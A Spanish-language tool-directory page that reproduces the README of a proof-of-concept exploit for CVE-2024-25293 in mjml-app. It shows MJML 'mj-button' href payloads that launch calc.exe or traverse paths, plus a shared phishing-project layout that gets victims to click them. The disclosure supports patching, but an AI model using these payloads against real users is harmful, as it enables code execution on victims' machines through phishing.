Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-25293 — mjml-app v3.0.4 & 3.1.0-beta RCE exploit | Kitploit
Herramientas/GitHubGitHub/eqstlab/cve-2024-25293
Herramientas de PhishingGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebMala Configuración
GitHubeqstlab/cve-2024-25293

CVE-2024-25293

mjml-app v3.0.4 & 3.1.0-beta RCE exploit

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC de Ejecución de Código Local en MJML

Una Prueba de Concepto para la vulnerabilidad CVE-2024-25293.

Se descubrió que mjml-app v3.0.4 y 3.1.0-beta contienen una vulnerabilidad de ejecución remota de código (RCE). En este repositorio hay una aplicación vulnerable de ejemplo y un exploit de prueba de concepto (PoC).

Como PoC, hay un archivo python que automatiza el proceso.

1. Resumen de la Vulnerabilidad:

  • Título de la Vulnerabilidad: Ejecución de Código Local
  • Versión Vulnerable: mjml-app 3.0.4-win y mjml-app 3.1.0-beta
  • Tipo de Ataque: Ejecución Remota de Código
  • Componente del Ataque: En la etiqueta 'mj-button' dentro del archivo de código fuente afectado, el atributo 'href' permite la ejecución de código local.
  • Número CVE Reservado: CVE-2024-25293

2. Causa de la Vulnerabilidad:

  • mjml-app 3.0.4-win y mjml-app 3.1.0-beta sufren de una mala configuración de seguridad en la etiqueta 'mj-button', lo que puede resultar en la ejecución de código arbitrario.
  • Explicación del exploit
    • La ejecución de archivos locales a través de etiquetas de evento en aplicaciones mjml representa una amenaza de seguridad. Además, el código puede ejecutarse combinando Path Traversal dentro de la aplicación, lo que requiere un parche. image

Prueba de concepto (PoC)

Paso 1) El atacante crea un 'mj-button' con una etiqueta 'href' y

  • caso 1) Ejecución de Código con Path Traversal (notepad.exe)
  • caso 2) Ejecución de Código (calc.exe)
root@kitploit:~
<mjml>
  <mj-body>
    <mj-section>
      <mj-column>
        <mj-button background-color="#f45e43" color="white" href="C:\Users\EQST\Desktop\jruru\..\jruru_hacked.txt"> jruru </mj-button>
        <mj-button background-color="#f45e43" color="white" href="C:Windows/System32/calc.exe"> Code Execution </mj-button>
      </mj-column>
    </mj-section>
  </mj-body>
</mjml>

mjml1

Paso 2) El atacante crea el proyecto principal de phishing con el siguiente código.

root@kitploit:~
<!-- header.mjml -->
<mj-section>
  <mj-column>
    <mj-text>This is a demo jruru</mj-text>
  </mj-column>
</mj-section>
<!-- main.mjml -->
<mj-include path="./index.mjml" />

mjml2

Paso 3) La víctima abre el proyecto compartido y hace clic en el botón, lo que desencadena la ejecución del payload (p. ej., calc, notepad) mjml3


3. Información Adicional

Ejecutar archivos exe a través de etiquetas href dentro de una aplicación es riesgoso, y ejecutar archivos en combinación con Path Traversal es un problema de seguridad. Esto permite crear y desplegar proyectos de phishing para ejecutar archivos locales. Por lo tanto, es esencial modificar esta funcionalidad para evitar dicha ejecución.

Descargar herramienta